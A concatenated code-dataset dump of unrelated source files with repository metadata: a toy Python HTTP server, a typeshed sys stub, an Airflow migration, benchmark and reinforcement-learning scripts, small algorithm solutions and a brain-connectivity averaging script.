request = client_socket.recv(1024).decode()
except Exception as e:
print("---------2---------", e)
else:
if request:
self.deal_with_request(request, client_socket)
else:
client_socket.close()
self.client_socket_list.remove(client_socket)
print(self.client_socket_list)
def deal_with_request(self, request, client_socket):
"""为当前浏览器服务"""
if not request:
return
request_lines = request.splitlines()
for i, line in enumerate(request_lines):
print(i, "\t", line)
# 提取请求文件
ret = re.match(r"[^/]*([^ ]+)", request_lines[0])
if ret:
print("提取数据>>>>[%s]" % ret.group(1))
file_name = ret.group(1)
if file_name == "/":
file_name = "index.html"
else:
return
# 读文件
try:
f = open(self.documents_root + file_name, "rb")
except:
response_body = "file not found, 请输入正确的url"
response_header = "HTTP/1.1 404 not found\r\n"
response_header += "Content-Type: text/html; charset=utf-8\r\n"
response_header += "Content-Length: %d\r\n" % (len(response_body))
response_header += "\r\n"
# 返回浏览器
client_socket.send((response_header + response_body).encode())
else:
content = f.read()
f.close()
response_body = content
response_header = "HTTP/1.1 200 0K\r\n"
response_header += "Content-Length: %d\r\n" % (len(response_body))
response_header += "\r\n"
client_socket.send((response_header + response_body).encode())
def main():
"""控制web服务器整体"""
if len(sys.argv) == 2:
port = sys.argv[1]
if port.isdigit():
port = int(port)
elif len(sys.argv) == 1:
port = None
else:
print("运行方式如: python3 xxx.py 7890")
http_server = WSGIServer("./html", port)
http_server.run_forever()
if __name__ == '__main__':
main()
|
[
"vstarman@foxmail.com"
] |
vstarman@foxmail.com
|
79d6585724e04b28bac073cb392c9c5ef0bd59b8
|
d4a569dcf616b7f05e53a44803e38196b436b8b9
|
/Thesis@3.9.1/Lib/site-packages/mypy/typeshed/stdlib/3/sys.pyi
|
d4f755c1ad33599685ded3ba3658e1b9ccca7d02
|
[
"MIT"
] |
permissive
|
nverbois/TFE21-232
|
ac3178d24939c872c02a671c0f1d8cc471af516b
|
7113837b5263b5c508bfc6903cb6982b48aa7ee4
|
refs/heads/main
| 2023-06-05T18:50:59.207392
| 2021-06-25T19:54:40
| 2021-06-25T19:54:40
| 337,691,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,925
|
pyi
|
# Stubs for sys
# Ron Murawski <ron@horizonchess.com>
# based on http://docs.python.org/3.2/library/sys.html
from typing import (
List,
NoReturn,
Sequence,
Any,
Dict,
Tuple,
TextIO,
overload,
Optional,
Union,
TypeVar,
Callable,
Type,
)
import sys
from types import FrameType, ModuleType, TracebackType
from importlib.abc import MetaPathFinder
_T = TypeVar("_T")
# The following type alias are stub-only and do not exist during runtime
_ExcInfo = Tuple[Type[BaseException], BaseException, TracebackType]
_OptExcInfo = Union[_ExcInfo, Tuple[None, None, None]]
# ----- sys variables -----
abiflags: str
argv: List[str]
base_exec_prefix: str
base_prefix: str
byteorder: str
builtin_module_names: Sequence[str] # actually a tuple of strings
copyright: str
# dllhandle = 0 # Windows only
dont_write_bytecode: bool
displayhook: Callable[[object], Any]
excepthook: Callable[[Type[BaseException], BaseException, TracebackType], Any]
exec_prefix: str
executable: str
float_repr_style: str
hexversion: int
last_type: Optional[Type[BaseException]]
last_value: Optional[BaseException]
last_traceback: Optional[TracebackType]
maxsize: int
maxunicode: int
meta_path: List[MetaPathFinder]
modules: Dict[str, ModuleType]
path: List[str]
path_hooks: List[Any] # TODO precise type; function, path to finder
path_importer_cache: Dict[str, Any] # TODO precise type
platform: str
if sys.version_info >= (3, 9):
platlibdir: str
prefix: str
if sys.version_info >= (3, 8):
pycache_prefix: Optional[str]
ps1: str
ps2: str
stdin: TextIO
stdout: TextIO
stderr: TextIO
__stdin__: TextIO
__stdout__: TextIO
__stderr__: TextIO
tracebacklimit: int
version: str
api_version: int
warnoptions: Any
# Each entry is a tuple of the form (action, message, category, module,
# lineno)
# winver = '' # Windows only
_xoptions: Dict[Any, Any]
flags: _flags
class _flags:
debug: int
division_warning: int
inspect: int
interactive: int
optimize: int
dont_write_bytecode: int
no_user_site: int
no_site: int
ignore_environment: int
verbose: int
bytes_warning: int
quiet: int
hash_randomization: int
if sys.version_info >= (3, 7):
dev_mode: int
utf8_mode: int
float_info: _float_info
class _float_info:
epsilon: float # DBL_EPSILON
dig: int # DBL_DIG
mant_dig: int # DBL_MANT_DIG
max: float # DBL_MAX
max_exp: int # DBL_MAX_EXP
max_10_exp: int # DBL_MAX_10_EXP
min: float # DBL_MIN
min_exp: int # DBL_MIN_EXP
min_10_exp: int # DBL_MIN_10_EXP
radix: int # FLT_RADIX
rounds: int # FLT_ROUNDS
hash_info: _hash_info
class _hash_info:
width: int
modulus: int
inf: int
nan: int
imag: int
implementation: _implementation
class _implementation:
name: str
version: _version_info
hexversion: int
cache_tag: str
int_info: _int_info
class _int_info:
bits_per_digit: int
sizeof_digit: int
class _version_info(Tuple[int, int, int, str, int]):
major: int
minor: int
micro: int
releaselevel: str
serial: int
version_info: _version_info
def call_tracing(__func: Callable[..., _T], __args: Any) -> _T: ...
def _clear_type_cache() -> None: ...
def _current_frames() -> Dict[int, Any]: ...
def _debugmallocstats() -> None: ...
def __displayhook__(value: object) -> None: ...
def __excepthook__(
type_: Type[BaseException], value: BaseException, traceback: TracebackType
) -> None: ...
def exc_info() -> _OptExcInfo: ...
# sys.exit() accepts an optional argument of anything printable
def exit(__status: object = ...) -> NoReturn: ...
def getdefaultencoding() -> str: ...
if sys.platform != "win32":
# Unix only
def getdlopenflags() -> int: ...
def getfilesystemencoding() -> str: ...
def getrefcount(__object: Any) -> int: ...
def getrecursionlimit() -> int: ...
@overload
def getsizeof(obj: object) -> int: ...
@overload
def getsizeof(obj: object, default: int) -> int: ...
def getswitchinterval() -> float: ...
def _getframe(__depth: int = ...) -> FrameType: ...
_ProfileFunc = Callable[[FrameType, str, Any], Any]
def getprofile() -> Optional[_ProfileFunc]: ...
def setprofile(profilefunc: Optional[_ProfileFunc]) -> None: ...
_TraceFunc = Callable[
[FrameType, str, Any], Optional[Callable[[FrameType, str, Any], Any]]
]
def gettrace() -> Optional[_TraceFunc]: ...
def settrace(tracefunc: Optional[_TraceFunc]) -> None: ...
class _WinVersion(
Tuple[int, int, int, int, str, int, int, int, int, Tuple[int, int, int]]
):
major: int
minor: int
build: int
platform: int
service_pack: str
service_pack_minor: int
service_pack_major: int
suite_mast: int
product_type: int
platform_version: Tuple[int, int, int]
def getwindowsversion() -> _WinVersion: ... # Windows only
def intern(__string: str) -> str: ...
def is_finalizing() -> bool: ...
if sys.version_info >= (3, 7):
__breakpointhook__: Any # contains the original value of breakpointhook
def breakpointhook(*args: Any, **kwargs: Any) -> Any: ...
def setdlopenflags(__flags: int) -> None: ... # Linux only
def setrecursionlimit(__limit: int) -> None: ...
def setswitchinterval(__interval: float) -> None: ...
def gettotalrefcount() -> int: ... # Debug builds only
if sys.version_info < (3, 9):
def getcheckinterval() -> int: ... # deprecated
def setcheckinterval(__n: int) -> None: ... # deprecated
if sys.version_info >= (3, 8):
# not exported by sys
class UnraisableHookArgs:
exc_type: Type[BaseException]
exc_value: Optional[BaseException]
exc_traceback: Optional[TracebackType]
err_msg: Optional[str]
object: Optional[object]
unraisablehook: Callable[[UnraisableHookArgs], Any]
def addaudithook(hook: Callable[[str, Tuple[Any, ...]], Any]) -> None: ...
def audit(__event: str, *args: Any) -> None: ...
|
[
"38432529+nverbois@users.noreply.github.com"
] |
38432529+nverbois@users.noreply.github.com
|
a743c452d4c63fee68c318c62fa4043b50388f12
|
7137161629a1003583744cc3bd0e5d3498e0a924
|
/airflow/migrations/versions/142555e44c17_add_data_interval_start_end_to_dagmodel_and_dagrun.py
|
2eedcb81c6444f27cf2d8e79fb281f9a9134fc2e
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
jbampton/airflow
|
3fca85975854eb916f16143b659a9119af143963
|
dcfa14d60dade3fdefa001d10013466fe4d77f0d
|
refs/heads/master
| 2023-05-25T22:31:49.104069
| 2021-09-18T19:18:32
| 2021-09-18T19:18:32
| 247,645,744
| 3
| 0
|
Apache-2.0
| 2020-03-16T08:12:58
| 2020-03-16T08:12:57
| null |
UTF-8
|
Python
| false
| false
| 2,859
|
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Add data_interval_[start|end] to DagModel and DagRun.
Revision ID: 142555e44c17
Revises: 54bebd308c5f
Create Date: 2021-06-09 08:28:02.089817
"""
from alembic import op
from sqlalchemy import TIMESTAMP, Column
from sqlalchemy.dialects import mssql, mysql
# Revision identifiers, used by Alembic.
revision = "142555e44c17"
down_revision = "54bebd308c5f"
branch_labels = None
depends_on = None
def _use_date_time2(conn):
result = conn.execute(
"""SELECT CASE WHEN CONVERT(VARCHAR(128), SERVERPROPERTY ('productversion'))
like '8%' THEN '2000' WHEN CONVERT(VARCHAR(128), SERVERPROPERTY ('productversion'))
like '9%' THEN '2005' ELSE '2005Plus' END AS MajorVersion"""
).fetchone()
mssql_version = result[0]
return mssql_version not in ("2000", "2005")
def _get_timestamp(conn):
dialect_name = conn.dialect.name
if dialect_name == "mysql":
return mysql.TIMESTAMP(fsp=6, timezone=True)
if dialect_name != "mssql":
return TIMESTAMP(timezone=True)
if _use_date_time2(conn):
return mssql.DATETIME2(precision=6)
return mssql.DATETIME
def upgrade():
"""Apply data_interval fields to DagModel and DagRun."""
column_type = _get_timestamp(op.get_bind())
with op.batch_alter_table("dag_run") as batch_op:
batch_op.add_column(Column("data_interval_start", column_type))
batch_op.add_column(Column("data_interval_end", column_type))
with op.batch_alter_table("dag") as batch_op:
batch_op.add_column(Column("next_dagrun_data_interval_start", column_type))
batch_op.add_column(Column("next_dagrun_data_interval_end", column_type))
def downgrade():
"""Unapply data_interval fields to DagModel and DagRun."""
with op.batch_alter_table("dag_run") as batch_op:
batch_op.drop_column("data_interval_start")
batch_op.drop_column("data_interval_end")
with op.batch_alter_table("dag") as batch_op:
batch_op.drop_column("next_dagrun_data_interval_start")
batch_op.drop_column("next_dagrun_data_interval_end")
|
[
"noreply@github.com"
] |
jbampton.noreply@github.com
|
5d1e6afc58cdf15e0476c647d701b742ce6780f6
|
60cf82eeddce21893f06a4b76e5b0515430b3ef2
|
/src/sintax/formats/criterion.py
|
a1e085b7288cde54d37257460d492ba2b9018613
|
[
"ISC"
] |
permissive
|
theasylum/sintax
|
963e89c0984ee22b4f873d62cdac063efc6b748f
|
a81fdf1a891595168df53ac1d177d99eac16fb76
|
refs/heads/master
| 2020-06-22T15:26:33.171259
| 2019-07-19T08:46:29
| 2019-07-19T08:46:29
| 197,737,261
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,797
|
py
|
"""
Reads Criterion "raw.csv" files, and returns the resulting input into a
dictionary that can be further manipulated.
Criterion stores results as follows:
$PROJECT/target/criterion/{benchmark group}/{function name}/
{value passed to function (parameters)}/
Inside that folder there are two other folders, named:
- base: This is the results from the previous or first run
- new: This is the most current results from the current run
We basically have to walk the directory tree, find each of the raw.csv
files inside the new folder, and then parse that.
Criterion runs the same benchmark function multiple times, with multiple
iteration counts, mainly to get a good statistical sampling. This means the
.csv files contain 1 or more entries.
"""
import csv
import os
from pathlib import Path
def _name(group, function, value):
if value:
return f"{group}/{function}/{value}"
return f"{group}/{function}"
def _build_results(path, *, aggregate=False):
"""
Reads a CSV file and returns the results as dictionaries one by one, if the
file is not a valid Criterion .csv we ignore it, and return None
"""
with open(path, newline="") as raw_csv:
header = raw_csv.readline()
if header.strip() != "group,function,value,sample_time_nanos,iteration_count":
return
criterion_csv = csv.DictReader(
raw_csv,
fieldnames=(
"group",
"function",
"value",
"sample_time_nanos",
"iteration_count",
),
)
for row in criterion_csv:
yield {
"name": _name(row["group"], row["function"], row["value"]),
"iterations": row["iteration_count"],
# Criterion doesn't differentiate between real time that has
# expired vs the amount of CPU time used, so we just set them
# to be the same
"real_time": row["sample_time_nanos"],
"cpu_time": row["sample_time_nanos"],
"time_unit": "ns",
"run_type": "iteration",
}
def reader(path, *, aggregate=False):
"""
Yields results for reach of the raw.csv files found in the path provided.
Unfortunately the files are not collected together into a single location
by default.
"""
for root, dirs, files in os.walk(path):
if {"new", "base"} <= set(dirs):
# We are now inside a test directory where we want to read new/raw.csv
yield from _build_results(
Path(root) / "new" / "raw.csv", aggregate=aggregate
)
else: # pragma: nocover (bug in coverage)
continue
|
[
"bertjw@regeer.org"
] |
bertjw@regeer.org
|
753ead96f492949a999e23032b1dce59150254e9
|
ba99df13d39dc8aa696c38a6c49d5193ce5c4c80
|
/scripts/box3d_trpo/run_box3d_pixel_v15_tf_fred_arch.py
|
bf6b510b2555cccd040e0c4dd8d3f1264665f7e8
|
[
"MIT"
] |
permissive
|
fredshentu/public_model_based_controller
|
e5434ec075420ec5dd6d7355ba4751744a9b6248
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
refs/heads/master
| 2021-08-28T01:08:12.166349
| 2017-12-11T01:11:36
| 2017-12-11T01:11:36
| 113,795,659
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
import os
from sandbox.rocky.tf.baselines.nn_baseline import NNBaseline
from sandbox.rocky.tf.core.network import ConvNetwork
from sandbox.rocky.tf.policies.gaussian_conv_feature_policy import GaussianConvFeaturePolicy
from sandbox.rocky.tf.policies.gaussian_conv_policy import GaussianConvPolicy
from rllab.baselines.zero_baseline import ZeroBaseline
from rllab.envs.normalized_env import normalize
from sandbox.rocky.tf.samplers.batch_sampler import BatchSampler
from sandbox.rocky.tf.algos.trpo import TRPO
from rllab.misc.instrument import stub, run_experiment_lite
from sandbox.rocky.tf.envs.base import TfEnv
from rllab.envs.gym_env import GymEnv
import itertools
import tensorflow as tf
stub(globals())
# Params range
seeds = range(0, 2)
for seed in seeds:
env = TfEnv(normalize(env=GymEnv('Box3dReachPixel-v15',record_video=False, \
log_dir='/tmp/gym_test',record_log=False)))
env_spec = env.spec
policy_cnn = ConvNetwork(
name="policy_conv_network",
input_shape=env_spec.observation_space.shape,
output_dim=env_spec.action_space.flat_dim,
conv_filters=(64, 64, 64, 32),
conv_filter_sizes=((5,5),(5,5),(5,5),(3,3)),
conv_strides=(3, 3, 3, 2),
conv_pads=('SAME', 'SAME', 'SAME', 'SAME'),
hidden_sizes=(256,),
hidden_nonlinearity=tf.nn.relu,
output_nonlinearity=None,
)
baseline_cnn = ConvNetwork(
name="baseline_conv_network",
input_shape=env_spec.observation_space.shape,
output_dim=env_spec.action_space.flat_dim,
conv_filters=(64, 64, 64, 32),
conv_filter_sizes=((5,5),(5,5),(5,5),(3,3)),
conv_strides=(3, 3, 3, 2),
conv_pads=('SAME', 'SAME', 'SAME', 'SAME'),
hidden_sizes=(256,),
hidden_nonlinearity=tf.nn.relu,
output_nonlinearity=None,
)
policy = GaussianConvFeaturePolicy(
"conv_feature_policy",
env_spec=env_spec,
feature_network=policy_cnn,
hidden_sizes=(128,64),
clip_action=False,
)
baseline = NNBaseline(
env_spec=env_spec,
feature_network=baseline_cnn,
hidden_sizes=(128,64),
hidden_nonlinearity=tf.nn.relu,
init_lr=5e-4,
n_itr=10,
train_feature_network=True,
)
batch_size = 9600
algo = TRPO(
env=env,
policy=policy,
baseline=baseline,
batch_size=batch_size,
whole_paths=True,
max_path_length=1000,
n_itr=1000,
step_size=0.01,
subsample_factor=1.0,
sampler_cls=BatchSampler,
optimizer_args={
'num_slices' : 8,
}
)
run_experiment_lite(
algo.train(),
exp_prefix='trpo_box3d_pixel_v15_tf_fred_arch',
n_parallel=12,
snapshot_mode="gap",
snapshot_gap=200,
seed=seed,
mode="local"
)
|
[
"fred960315@gmail.com"
] |
fred960315@gmail.com
|
a7792d90a0b66b5d879402881bb716e6b36e682e
|
18a7c2173eb4fbb66bcc8b2ef117aad863846b83
|
/etc/krri.py
|
2d80dc5b94937d43053fc554347ee0e474096650
|
[] |
no_license
|
mynameiskirang/python
|
5968607f6f61406e9f4b69b1a9edff31e84df153
|
4a48ea50378f9e079d0ece9110fc33afadf77434
|
refs/heads/master
| 2020-05-19T17:49:50.720578
| 2019-04-21T16:13:28
| 2019-04-21T16:13:28
| null | 0
| 0
| null | null | null | null |
UHC
|
Python
| false
| false
| 1,066
|
py
|
import csv
col = 10
blank = 4
arr = [[""]*(col*blank) for i in range(600000)]
setting = [[""]*8 for i in range(27)]
Num = 0
for num in range(1,10):
for i in range(0, col):
for j in range(0, 10):
try:
#읽을파일
rname= "Graph"+str(num)+"_Wave_Tshort_00" + str(i) + str(j) + ".csv"
print(rname)
rf = open(rname)
Num = num
except Exception as E:
#파일이 없을시 종료
print(E)
continue
reader = csv.reader(rf, delimiter=',')
reader = list(reader)
if i==0 and j==0:
for k in range(0,27):
setting[k] = reader[k]
for k in range(27, 60027):
arr[k-27 + j*60000][i*blank +1] = reader[k][1]
f = open('Graph'+str(Num)+'_Wave_Tshort.csv', 'w', encoding='utf-8', newline='')
wf = csv.writer(f)
for i in range(0, 27):
wf.writerow(setting[i])
for i in range(0, 600000):
wf.writerow(arr[i])
|
[
"na_qa@icloud.com"
] |
na_qa@icloud.com
|
cfd926890b7a12f971499b3d9a97b2535364d58e
|
786027545626c24486753351d6e19093b261cd7d
|
/ghidra9.2.1_pyi/ghidra/util/graph/Edge.pyi
|
2e34bad38d5952aca6e6483e08bacaac28e839b6
|
[
"MIT"
] |
permissive
|
kohnakagawa/ghidra_scripts
|
51cede1874ef2b1fed901b802316449b4bf25661
|
5afed1234a7266c0624ec445133280993077c376
|
refs/heads/main
| 2023-03-25T08:25:16.842142
| 2021-03-18T13:31:40
| 2021-03-18T13:31:40
| 338,577,905
| 14
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,520
|
pyi
|
import ghidra.util.graph
import java.lang
class Edge(object, ghidra.util.graph.KeyedObject, java.lang.Comparable):
"""
An Edge joins a pair of vertices.
The from and to vertex of an edge can not be changed.
"""
def __init__(self, from_: ghidra.util.graph.Vertex, to: ghidra.util.graph.Vertex):
"""
@param from The from or parent vertex.
@param to The to or child vertex.
"""
...
@overload
def compareTo(self, edge: ghidra.util.graph.Edge) -> int:
"""
Compare one edge to another. Based on time of creation.
"""
...
@overload
def compareTo(self, __a0: object) -> int: ...
def equals(self, obj: object) -> bool:
"""
Overides equals method by comparing keys.
"""
...
def from(self) -> ghidra.util.graph.Vertex:
"""
Returns from vertex.
"""
...
def getClass(self) -> java.lang.Class: ...
def hashCode(self) -> int: ...
def key(self) -> long:
"""
Returns the key of this edge.
"""
...
def notify(self) -> None: ...
def notifyAll(self) -> None: ...
def to(self) -> ghidra.util.graph.Vertex:
"""
Returns to vertex.
"""
...
def toString(self) -> unicode: ...
@overload
def wait(self) -> None: ...
@overload
def wait(self, __a0: long) -> None: ...
@overload
def wait(self, __a0: long, __a1: int) -> None: ...
|
[
"tsunekou1019@gmail.com"
] |
tsunekou1019@gmail.com
|
859989ba770691ea96442cfcb7bbca9d2a652d36
|
9cdfe7992090fb91696eec8d0a8ae15ee12efffe
|
/greedy/maxMeetingsInRoom.py
|
c72a5d81483d96a85aa1f85718ef0ebd0ad17341
|
[] |
no_license
|
binchen15/leet-python
|
e62aab19f0c48fd2f20858a6a0d0508706ae21cc
|
e00cf94c5b86c8cca27e3bee69ad21e727b7679b
|
refs/heads/master
| 2022-09-01T06:56:38.471879
| 2022-08-28T05:15:42
| 2022-08-28T05:15:42
| 243,564,799
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 573
|
py
|
# wrong answer. Suspect the solution is wrong
class Solution:
def maxMeetings(self, N : int, S : List[int], F : List[int]) -> List[int]:
# code here
meets = list(zip(F, S, range(1, N+1)))
meets.sort(key = lambda x: (x[0], x[1]))
ans = [meets[0]]
i = 1
while i < N:
while i < N and meets[i][1] <= ans[-1][0]:
i += 1
if i < N:
ans.append(meets[i])
i += 1
else:
break
return sorted([meet[2] for meet in ans])
|
[
"binchen.swe@gmail.com"
] |
binchen.swe@gmail.com
|
7d0de73ae40f72ae5e0dd9c1981cc60ab149e75e
|
0b793bce2da8c3d09b7956c0672ddbffd46feaed
|
/atcoder/arc/arc084_a.py
|
d067d9c30e55cb49bb016c94a255db4d323cc47e
|
[
"MIT"
] |
permissive
|
knuu/competitive-programming
|
c6c4e08fb231937d988bdc5a60a8ad6b31b97616
|
16bc68fdaedd6f96ae24310d697585ca8836ab6e
|
refs/heads/master
| 2021-01-17T09:39:02.647688
| 2020-11-07T03:17:22
| 2020-11-07T03:17:22
| 27,886,732
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 332
|
py
|
from bisect import bisect_left
N = int(input())
A = sorted(int(x) for x in input().split())
B = sorted(int(x) for x in input().split())
C = sorted(int(x) for x in input().split())
cnt = [0] * (N + 1)
for i, b in enumerate(B):
cnt[i + 1] = bisect_left(A, b)
cnt[i + 1] += cnt[i]
print(sum(cnt[bisect_left(B, c)] for c in C))
|
[
"premier3next@gmail.com"
] |
premier3next@gmail.com
|
ac79f8d7257e3bf527da58a1c4b70d913cda6521
|
39e1e256acae3fe9be4434024d42b9bb47bdd02f
|
/analysis/submissions/e88d1e36c4db7410802b3fda6db81d38_task1-1_1597071296/task1-1/main.py
|
bf7fdcd651f55cfacb57e5584ca141091694c7ef
|
[] |
no_license
|
neulab/tranx-study
|
9fb67b9a2181f0b362e4f97316c502eee4539b19
|
e2a7089689f7f95e773e19c8f19513abe4fb8b9b
|
refs/heads/master
| 2023-06-14T04:46:01.010892
| 2021-07-08T09:29:05
| 2021-07-08T09:29:05
| 250,357,553
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 366
|
py
|
# Example code, write your program here
import random
import string
import pprint
characters_list=[]
int_list=[]
for i in range(100):
characters_list.append(random.choice(string.ascii_lowercase))
int_list.append(random.randint(1, 21))
#print(characters_list)
#print(int_list)
dictionary = dict(zip(characters_list, int_list))
pprint.pprint(dictionary)
|
[
"frankxu2004@gmail.com"
] |
frankxu2004@gmail.com
|
4e452ec076db8ba7fd506905ae39e9d8ae5a789b
|
0d9fda11b6f6b0cb1cf397aa45dd21cf3a612b15
|
/docs/projects/oop-in-python/msdie.py
|
927ff5409510a059756145ac111486be6e4d03e7
|
[
"MIT"
] |
permissive
|
milpontiangwenya/tech-department
|
c98eb9375558c81f022a9615b3f9c53fa2cfa4b9
|
7a4e7d7cd2675c19510cf9a80dcac504674111ce
|
refs/heads/master
| 2022-02-07T12:46:27.927665
| 2019-07-23T06:45:05
| 2019-07-23T06:45:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
#class definition for an n-sided die
#import packages
class MSdie:
#constructor here
#define classmethod 'roll' to roll the MSdie
#define classmethod 'getValue' to return the current value of the MSdie
#define classmethod 'setValue' to set the die to a particular value
|
[
"sheena.oconnell@gmail.com"
] |
sheena.oconnell@gmail.com
|
16dc363eea70d018e7688966abab2cf64ad39754
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_144/ch46_2020_04_06_19_03_41_278160.py
|
359be63da56cf45e5606981e79c2a3b001d2471e
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 177
|
py
|
def numero_no_indice(lista):
i = 0
new_list = []
while i < len(lista):
if lista[i] == i:
new_list.append(i)
i +=1
return new_list
|
[
"you@example.com"
] |
you@example.com
|
e05c00915f992b03e9d9703f593bb0844b22ee57
|
ddc15592dede715b4aff97a10009d39bba76e566
|
/lsnm_in_python/analysis/avg_FC_diffs_across_subjs.py
|
d5dbdd3821babd54263ffe896edda9a788746676
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
xlong0513/Brain_inspired
|
d8a5c02da17f56d8906d5fa76efd3a757c5b5ae0
|
816c1c4fd5eb19d0463ba19c0a8c0db8465b4912
|
refs/heads/master
| 2022-06-01T20:44:07.366460
| 2020-05-05T10:05:36
| 2020-05-05T10:05:36
| 256,150,573
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,842
|
py
|
# ============================================================================
#
# PUBLIC DOMAIN NOTICE
#
# National Institute on Deafness and Other Communication Disorders
#
# This software/database is a "United States Government Work" under the
# terms of the United States Copyright Act. It was written as part of
# the author's official duties as a United States Government employee and
# thus cannot be copyrighted. This software/database is freely available
# to the public for use. The NIDCD and the U.S. Government have not placed
# any restriction on its use or reproduction.
#
# Although all reasonable efforts have been taken to ensure the accuracy
# and reliability of the software and data, the NIDCD and the U.S. Government
# do not and cannot warrant the performance or results that may be obtained
# by using this software or data. The NIDCD and the U.S. Government disclaim
# all warranties, express or implied, including warranties of performance,
# merchantability or fitness for any particular purpose.
#
# Please cite the author in any work or product based on this material.
#
# ==========================================================================
# ***************************************************************************
#
# Large-Scale Neural Modeling software (LSNM)
#
# Section on Brain Imaging and Modeling
# Voice, Speech and Language Branch
# National Institute on Deafness and Other Communication Disorders
# National Institutes of Health
#
# This file (avg_FC_diffs_across_subjs.py) was created on December 3, 2016.
#
#
# Author: Antonio Ulloa
#
# Last updated by Antonio Ulloa on December 3 2016
#
# **************************************************************************/
#
# avg_FC_diffs_across_subjs.py
#
# Reads functional connectivity differences from input files corresponding to
# difference subjects and it calculates an average, after which it displays
# a average in matrix form as well as a histogram. We also
# calculate kurtosis and skewness of the histogram.
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import kurtosis
from scipy.stats import skew
from matplotlib import cm as CM
# declare ROI labels
labels = ['rLOF',
'rPORB',
'rFP' ,
'rMOF' ,
'rPTRI',
'rPOPE',
'rRMF' ,
'rSF' ,
'rCMF' ,
'rPREC',
'rPARC',
'rRAC' ,
'rCAC' ,
'rPC' ,
'rISTC',
'rPSTC',
'rSMAR',
'rSP' ,
'rIP' ,
'rPCUN',
'rCUN' ,
'rPCAL',
'rLOCC',
'rLING',
'rFUS' ,
'rPARH',
'rENT' ,
'rTP' ,
'rIT' ,
'rMT' ,
'rBSTS',
'rST' ,
'rTT']
# define the names of the input files where the correlation coefficients were stored
FC_diff_subj1 = 'subject_11/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj2 = 'subject_12/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj3 = 'subject_13/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj4 = 'subject_14/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj5 = 'subject_15/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj6 = 'subject_16/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj7 = 'subject_17/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj8 = 'subject_18/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj9 = 'subject_19/xcorr_diffs_TB_minus_RS.npy'
FC_diff_subj10 = 'subject_20/xcorr_diffs_TB_minus_RS.npy'
# define the names of the average fucntional connectivies are stored (for both
# task-based and resting state)
xcorr_rs_avg_file = 'rs_fc_avg.npy'
xcorr_tb_avg_file = 'tb_fc_avg.npy'
# open files that contain correlation coefficients
fc_diff_subj1 = np.load(FC_diff_subj1)
fc_diff_subj2 = np.load(FC_diff_subj2)
fc_diff_subj3 = np.load(FC_diff_subj3)
fc_diff_subj4 = np.load(FC_diff_subj4)
fc_diff_subj5 = np.load(FC_diff_subj5)
fc_diff_subj6 = np.load(FC_diff_subj6)
fc_diff_subj7 = np.load(FC_diff_subj7)
fc_diff_subj8 = np.load(FC_diff_subj8)
fc_diff_subj9 = np.load(FC_diff_subj9)
fc_diff_subj10 = np.load(FC_diff_subj10)
# open files that contain functional connectivity averages
xcorr_rs_avg = np.load(xcorr_rs_avg_file)
xcorr_tb_avg = np.load(xcorr_tb_avg_file)
# construct numpy array containing functional connectivity arrays
fc_diff = np.array([fc_diff_subj1, fc_diff_subj2, fc_diff_subj3,
fc_diff_subj4, fc_diff_subj5, fc_diff_subj6,
fc_diff_subj7, fc_diff_subj8, fc_diff_subj9,
fc_diff_subj10 ])
# now, we need to apply a Fisher Z transformation to the correlation coefficients,
# prior to averaging.
fc_diff_z = np.arctanh(fc_diff)
fc_diff_z = np.arctanh(fc_diff)
# calculate the mean of correlation coefficients across all given subjects
fc_diff_z_mean = np.mean(fc_diff_z, axis=0)
fc_diff_z_mean = np.mean(fc_diff_z, axis=0)
# now, convert back to from Z to R correlation coefficients, prior to plotting
fc_diff_mean = np.tanh(fc_diff_z_mean)
fc_diff_mean = np.tanh(fc_diff_z_mean)
#initialize new figure for correlations of Resting State mean
fig = plt.figure('Across-subject average of FC differences (TB-RS)')
ax = fig.add_subplot(111)
# apply mask to get rid of upper triangle, including main diagonal
mask = np.tri(fc_diff_mean.shape[0], k=0)
mask = np.transpose(mask)
fc_diff_mean = np.ma.array(fc_diff_mean, mask=mask) # mask out upper triangle
# plot correlation matrix as a heatmap
cmap = CM.get_cmap('jet', 10)
cmap.set_bad('w')
cax = ax.imshow(fc_diff_mean, vmin=-1, vmax=1.0, interpolation='nearest', cmap=cmap)
ax.grid(False)
plt.colorbar(cax)
# change frequency of ticks to match number of ROI labels
plt.xticks(np.arange(0, len(labels)))
